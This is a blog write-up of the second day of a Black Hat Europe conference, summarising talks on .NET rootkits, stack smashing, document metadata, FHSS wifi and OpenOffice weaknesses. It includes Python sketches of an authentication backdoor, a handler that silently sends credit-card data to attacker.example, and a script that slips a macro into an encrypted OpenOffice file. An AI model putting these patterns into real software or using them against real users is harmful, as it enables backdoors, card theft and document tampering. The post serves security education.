After a hectic day 1, we roll into the 2nd day with some good talks. It’s just a pity that the conference is only 2 days.
.NET Framework Rootkits
Erez Metula took some time to explain the basics of post-exploitation against frameworks. I’d already had the pleasure of reading his article in the latest HAKIN9 magazine, so the basics were fresh in my mind. Although .NET was the chosen victim of the presentation, Erez went out of his way to ensure everybody knew that this attack vector is easily ported to other languages and platforms such as Java, PHP, and the Google Android engine. By exploiting .NET’s failure to validate its framework files, it was possible to insert compiled .NET code directly into an existing DLL. In effect, this allowed Erez to change common functions, such as authentication routines, to support magic codes (e.g. if the username is “GOD”, let him in), as well as insert backdoor listeners, duplicate logon processes (to send a username:password pair to the attacker as well) and even compromise cryptographic functions (through key fixation or downgrading).

.NET was chosen as the target for the talk as it is so common on Windows systems (installed by default on Win2K3 and above) and now has support on other platforms thanks to the MONO project. The process of altering the DLL and replacing it can be automated using tools Erez is due to make public on his website (http://www.applicationsecurity.co.il/.Net-Framework-Rootkits.aspx). The .Net-Sploit tool includes a number of pre-compiled modules, but is designed to be more of a Metasploit-type project, where the software acts as a framework for future code and attack vectors. I suggest you check out the slides from his website (or the Blackhat website) and download the tool to have a play about.
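To make the magic-code idea concrete, here’s a minimal sketch, with Python standing in for the patched .NET code (the real attack injects compiled IL into the DLL); all names here are invented for illustration:

```python
# Conceptual illustration only: the injected logic wraps the framework's real
# credential check with an attacker-defined "magic" username.

def original_authenticate(username: str, password: str) -> bool:
    """Stand-in for the framework's genuine credential check."""
    return (username, password) == ("alice", "s3cret")

def authenticate(username: str, password: str) -> bool:
    if username == "GOD":              # backdoor: the magic value always passes
        return True
    return original_authenticate(username, password)

print(authenticate("GOD", "anything"))  # True - backdoor in action
```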
Microsoft were advised of the issue that enabled DLLs to be replaced without their signatures being checked. However, due to the post-exploitation style of the attack, they declined to fix it. Some of the Microsoft representatives on-site seemed interested in the issue however, so there may be some movement on this in the near future. Keep your eyes open for a patch.
Due to time constraints the Java demo at the end of the talk was cut a little short. However, a brief demo of the same attack vector against the Java framework worked just as easily as the previous .NET demos. This attack vector is something I think we’ll be seeing more of in the future. Getting access to a server isn’t always the challenge; it’s getting ongoing access to the data on that server as it continues to process client requests (e.g. credit card details). With a quick change to the .NET functions that deal with the credit card transactions themselves, it’s easy to duplicate the sending of data to a second off-site (attacker-owned) system. Although there is a chance that these communications would trigger IDS alerts (the demos used clear-text HTTP for communications), attackers are likely to go to greater lengths to disguise the traffic as legitimate HTTPS communications. Code reviews (which are designed to find this kind of issue) are unlikely to discover it, as the source code used for the application has not been changed. Because the malicious code is inserted directly into the compiled DLL, only reverse engineering of the infected DLL would reveal the malicious functions.
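As a sketch of that “send it twice” idea (again plain Python rather than injected IL, and with an invented collection URL):

```python
# Hedged sketch: the patched transaction handler still performs the legitimate
# charge, then quietly duplicates the details to an off-site system.
import urllib.parse
import urllib.request

def charge_card(card_number: str, amount: float) -> None:
    """Stand-in for the application's real payment processing."""
    print(f"charging {amount} to card ending {card_number[-4:]}")

def process_transaction(card_number: str, amount: float) -> None:
    charge_card(card_number, amount)             # unchanged business logic
    payload = urllib.parse.urlencode({"cc": card_number, "amt": amount}).encode()
    try:
        # injected step - clear-text HTTP, just like the demo
        urllib.request.urlopen("http://attacker.example/collect", payload, timeout=2)
    except OSError:
        pass                                     # fail silently so nothing looks wrong
```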
This is something I’ll be trying to work into our penetration testing engagements in the near future. It’s eye-opening and a great source of client information.
Stack Smashing as of today
I managed to stick my head in to see Hagen Fritsch talk about stack smashing on 64-bit Linux systems. I wish I’d managed to make it for the start of the talk, as I never like to join a show in progress, even less so when it’s such a good (and technical) presentation. I’m not a specialist when it comes to things like ASLR and NX bypass, but the information was really well presented. I’m going to have to go back over the slides and really go in depth on some of the points made.
From what I did catch, however, Hagen discussed the methods commonly used under Linux to prevent buffer overflow attacks: the usual suspects of stack cookies, the non-executable (NX) stack and Address Space Layout Randomisation (ASLR). Bypass methods of a sort exist for all of these protections, but combining them makes it very hard to successfully overflow a buffer and run malicious code.
Some key points: SSP (Stack Smashing Protection) is only applied under Linux to char[] buffers over 4 bytes, which means that smaller buffers can still be vulnerable. Stack cookies are now the default on most major compilers (Visual Studio, gcc, etc.). Demos of guessing the timestamp used to form the canary, and of brute-forcing the 16-bit random section of ASLR, showed that the theory is sound. As I said, I wish I’d made it to the whole talk, and will definitely have to watch the video when it’s available.
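To illustrate why a time-derived canary is weak, here’s a toy sketch of the guessing attack (entirely my own construction, not code from the talk):

```python
# Toy model: if the canary comes from a PRNG seeded with the process start
# time, an attacker who roughly knows when the target started only has to
# try a small window of seeds.
import random
import time

def canary_from_seed(seed: int) -> int:
    """Derive a 32-bit canary from a PRNG seeded with a timestamp."""
    return random.Random(seed).getrandbits(32)

# victim side: canary generated from the (unknown) process start time
start = int(time.time())
target_canary = canary_from_seed(start)

# attacker side: walk a window of plausible start times until one matches
for guess in range(start - 300, start + 1):
    if canary_from_seed(guess) == target_canary:
        print(f"canary recovered with seed {guess}: {target_canary:#010x}")
        break
```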
Tactical Fingerprinting Using Metadata: Hidden Info and Lost Data
Metadata has been a topic on the rise for a while now. There have been lots of articles discussing its uses and the protections against it. I’ve even given a presentation and written a short (as yet unpublished) piece on metadata. Still, it’s always nice to be reminded how useful this information can be in a client-side attack. To drive the message home, some simple Google filetype searches and some examples (using bintext to extract the strings from files) were shown. The usual information was extracted: usernames, software versions, and some printer information and paths. Apart from the usual Microsoft Office and PDF targets, the speakers also briefly covered ODF and graphics files. Extraction of document revision history and other metadata with libextractor or Metagoofil was briefly touched on. There was no mention of the revisionist tool for pulling out previous revisions; however, that capability seems to be covered by the tool. This is nothing new really.

What may be of interest, however, is the tool released as part of this talk. Existing tools only support the extraction of metadata, not the recovery of lost data or hidden information. The FOCA (Fingerprinting and Organisation with Collected Archives) tool supports a range of formats and allows you to read the metadata from multiple files (including a nifty feature to export the metadata from images stored inside a PowerPoint presentation or other document). The demo was pretty impressive. Although the information can probably be extracted in a number of different ways (strings, hex editing, etc.), FOCA brings it all together into one easy tool. Support for batch processing is something that will come in very handy for penetration testers looking at large datasets. As well as offering the chance to read each document’s metadata, FOCA also pulls the relevant usernames, paths (folders), software versions, printer details and email addresses into one easy-to-read location. With direct support for Google and Live Search within the tool, you can easily analyse sites for metadata without having to download the files separately. The ability of the tool to group information into useful and readable groups is amazing. By analysing all the data from a sample domain it was possible to list 150 workstations with names, along with the valid users and paths on each machine. For a client-side attack this application is invaluable. I’ll be playing with this later.
FOCA version 0.7.6.4 is available from http://www.informatica64.com/FOCA
For those wanting an easier option, the developers provide an online version at the same address.
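If you want a feel for what’s actually sitting in these files without waiting for FOCA, a few lines of Python will dump the core metadata. A minimal sketch (“sample.odt” is a placeholder filename):

```python
# Not FOCA itself - just a sketch of the kind of extraction it automates.
# Both ODF and Office 2007 documents are zip archives with their metadata
# stored in a small XML member.
import xml.etree.ElementTree as ET
import zipfile

META = {".odt": "meta.xml", ".docx": "docProps/core.xml"}

def dump_metadata(path: str) -> None:
    member = next(m for ext, m in META.items() if path.endswith(ext))
    with zipfile.ZipFile(path) as doc:
        root = ET.fromstring(doc.read(member))
    for elem in root.iter():
        if elem.text and elem.text.strip():
            # strip the namespace prefix, e.g. "{...}creator" -> "creator"
            print(elem.tag.split("}")[-1], "=", elem.text.strip())

dump_metadata("sample.odt")
```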
A proof-of-concept (Spanish only) tool called oometastractor was also demonstrated, showing that the OpenOffice metadata cleaner doesn’t completely remove all data from a document. Hopefully this will be translated into English for your usage pleasure.
I managed to catch up with Chema Alonso and Enrique Rando for a short chat after the talk. They’re looking to expand the tool and incorporate support for new formats. One current limit of the tool is getting metadata directly from image files. Although this can be done for images embedded in other documents, it seems direct support isn’t yet implemented. They encourage people to give feedback on what formats they want to see supported, so get your requests in now. I’ve already asked for Adobe Photoshop and InDesign support. What metadata do you want to read today?
Yes it is too wifi, and no it’s not inherently secure
I wasn’t sure what to expect from this talk, but had a quick chat with the SpiderLabs/Trustwave crew beforehand. Some of the stuff they’re doing in reference to virtual teaming really interests me personally and professionally, so I hope to keep in touch with them in the future.
Rob Havelt’s talk focused on 802.11 FHSS (Frequency Hopping Spread Spectrum), a precursor to 802.11a/b/g/n. The original standard was created by ANSI/IEEE back in 1997 and revised in 1999. Although the limits of the technology restrict communications to 2Mbit/s, it is still in active use for bar-code scanners and warehouse systems across the world. Security implementations were based on a secret SSID, MAC filtering (impossible to bypass, of course) and the ever-faithful 40-bit WEP encryption. As anyone who knows wifi will be thinking, these aren’t much of a security system. Then again, FHSS was originally created back in World War II, so it’s showing its age just a little.
Layer 1 works very much like Bluetooth, hopping frequency about once every 400 milliseconds. The channels (79 in total) sit in the 2.4GHz range, and the system hops between frequencies in one of 78 patterns specified by the standard. Above layer 1, everything works exactly like 802.11a/b/g/n, making the process so much easier. After all, all security people are lazy, and we like to re-use existing code and research.
In order to capture the SSID required to connect to the network, a USRP with GNU Radio is used to listen on a single channel. Once the FHSS network hops to that channel, the SSID is visible in the management packets just like on other 802.11 wireless networks. With this SSID it is possible to join the network using a specific FHSS network card (the one used in the demo was a Spectrum24 by Symbol). At this point the MAC address filtering and 40-bit WEP encryption need to be addressed. This wasn’t covered in the talk directly, as WEP protection has already been done to death.
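The 802.11 side of that capture is easy enough to picture. Here’s a rough scapy sketch of pulling SSIDs out of management frames (my own illustration, not the talk’s tooling; it assumes a monitor-mode interface called mon0, and the FHSS layer-1 work still needs the USRP/GNU Radio side):

```python
# Rough sketch: extract SSIDs from 802.11 beacon frames. Above layer 1,
# FHSS traffic looks like any other 802.11 management traffic.
from scapy.all import Dot11, Dot11Beacon, Dot11Elt, sniff

def show_ssid(pkt):
    if pkt.haslayer(Dot11Beacon) and pkt.haslayer(Dot11Elt):
        ssid = pkt[Dot11Elt].info.decode(errors="replace")
        print(f"SSID {ssid!r} from BSSID {pkt[Dot11].addr3}")

sniff(iface="mon0", prn=show_ssid, store=0)   # needs monitor mode and root
```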
Rob explained that this kind of wireless is still found quite often during penetration tests, and is normally left unencrypted and unrestricted, using a simple bridge to the internal network. I can imagine that, given the age of the protocol and hardware used, software-defined radio was not even on the horizon when these systems were deployed. Some of the companies using this kind of wireless are under the impression that it is not exploitable due to the specific hardware requirements and the initial SSID requirement.
I’d love to grab one of these cards and do some playing around in this area. It goes quite well with the DECT interception I’m currently looking at, and I enjoy the myth-busting of these older “security through obscurity” products and protocols. I guess I’ll have to grab a USRP2 at some point to continue this research.
OpenOffice Security Design Weaknesses
I managed to talk a little with Eric Filiol and Jean-Paul Fizaine in the morning before their double-length talk. The topic sounded very interesting and, to my surprise, was based on the latest version 3 of OOo as well as the earlier versions. It’s always nice to see complete research that looks at several versions of a product instead of just focusing on one. The research for this talk began back in 2006 with version 2, which was then compared to the newer version 3 to examine what security changes had been made. It seems that many of the design-based security issues originally discovered in version 2 were recreated in version 3.
Due to the increased use of OpenOffice throughout Europe, there were a growing number of questions surrounding the security of the product. An analysis in 2006/2007 showed that version 2.x was very insecure. These findings were handed to the OpenOffice team. Leap forward to 2008, and version 3 of OpenOffice was released. Despite being hailed as a major evolution, it contained the same problems found in 2006.
OpenOffice 2
OpenOffice malware appeared in the wild in 2007 (BadBunny). Since then, there has been nothing major for the product. However, the risk is still very high, as the security design issues remain. These issues stem from the support for OOBasic, Python, Perl, JavaScript, Ruby and more being directly included in the document. BadBunny used multiple scripting languages to exploit Windows (JavaScript), Linux (Perl) and OSX (Ruby) systems. Combining this with the design of the macro security model makes it possible to exploit OpenOffice users on all platforms. And these are only a couple of the flaws mentioned.
OpenOffice 3
Version 3 fixed a few security issues and added Vista support. As the OpenOffice 3 document format is a basic zip format (rename to .zip and extract), it is possible to directly extract and change the document contents. This is similar in design to the Microsoft Office 2007 XML file formats. Some security settings are stored in the XML data (manifest.xml) in clear text; by changing these it is possible to simply bypass certain security restrictions on a file (e.g. password protection). Encryption of files is done using Blowfish in CFB mode, with SHA-1 for hashing. This encryption is better than the comparable MS Office encryption; however, OpenOffice doesn’t encrypt the manifest.xml file. After signing a document, a documentsignature.xml is created. Neither documentsignature.xml nor manifest.xml is signed or encrypted at any point, which allows an attacker to tamper with them.
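Since the format is just a zip archive, you can see this for yourself with nothing but the standard library. A minimal sketch (“document.odt” is a placeholder):

```python
# An ODF document is a plain zip archive, so the security-relevant
# manifest.xml can be read (and rewritten) trivially.
import zipfile

with zipfile.ZipFile("document.odt") as odt:
    print(odt.namelist())   # content.xml, styles.xml, META-INF/manifest.xml, ...
    manifest = odt.read("META-INF/manifest.xml").decode("utf-8")
    # Encryption parameters (algorithm, IV, salt, key derivation) sit here in
    # clear text for each encrypted entry - the manifest itself is never encrypted.
    print(manifest)
```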
Even if a document is encrypted, it is possible to delete an existing macro and replace it with a malicious version, and the end-user will not receive any alert about the change. If the document is signed, however, this attack vector is no longer possible.
As the security issues are built into the design, fixing them is not a quick or simple process. Removing support for so many macro scripting languages may be a start. Encryption and signing need to be looked at again with a stronger security focus in mind.
The technical information presented in the talk is available in a white-paper to be released on the Blackhat website.
In the second session of the talk we got to see the demos of the attacks in action. The uncompressed OpenOffice documents are very easy to deal with as long as you understand XML, and are very similar to the MS Office 2007 file layouts. Time to learn XML, people.
The demos showed that it’s child’s play to replace a macro in an encrypted document with a new (unencrypted) macro. By removing the encryption section of the manifest.xml for the macro and its associated files, you can fool OpenOffice into thinking everything is normal: “these are not the macros you’re looking for”. Even password protection of the document doesn’t affect this attack vector. The last demo showed a man-in-the-middle attack on a signed OpenOffice document. By grabbing the signed document in transit (take your pick of attack vectors here), the attacker can extract information on who owns the certificate and then forge a replacement certificate (using openssl to export to PKCS#12 format). This is then imported into the certificate store (using Firefox in this case) to allow OpenOffice to use the certificate, and the attacker can sign a new message. This attack falls down on a number of levels. If the sender is using a non-self-signed certificate, then the certificate chain will be different; however, how many users really check the whole chain? At first glance the certificate looks the same, although it’s self-signed. Still, this is a flaw with all self-signed certificates; they can be exploited in many ways, for many different purposes.
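Here’s a rough sketch of the macro swap in Python (my own reconstruction of the idea, with placeholder file names and paths, not the presenters’ code):

```python
# Rough sketch: drop an unencrypted macro into an "encrypted" document and
# strip its encryption entry from manifest.xml so OpenOffice accepts it as-is.
import re
import zipfile

SRC, DST = "protected.odt", "tampered.odt"
MACRO = "Basic/Standard/Module1.xml"   # hypothetical path of the target macro

with zipfile.ZipFile(SRC) as src, zipfile.ZipFile(DST, "w") as dst:
    for item in src.infolist():
        data = src.read(item.filename)
        if item.filename == MACRO:
            with open("evil_macro.xml", "rb") as f:   # unencrypted replacement
                data = f.read()
        elif item.filename == "META-INF/manifest.xml":
            # crudely rewrite the macro's <manifest:file-entry> so it no longer
            # carries a nested <manifest:encryption-data> element
            text = data.decode("utf-8")
            pattern = (r'(<manifest:file-entry[^>]*full-path="'
                       + re.escape(MACRO)
                       + r'"[^>]*)>.*?</manifest:file-entry>')
            text = re.sub(pattern, r"\1/>", text, flags=re.DOTALL)
            data = text.encode("utf-8")
        dst.writestr(item, data)
```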
and that’s a wrap
Well, it’s been a busy few days. I’d like to thank Didier Stevens for hooking me up with a press registration, and Blackhat for letting me attend at such late notice (you wouldn’t believe how late). This was a unique conference for me, and I really hope to attend the Blackhat conference in the US, or next year in Barcelona. Hope to see you all there.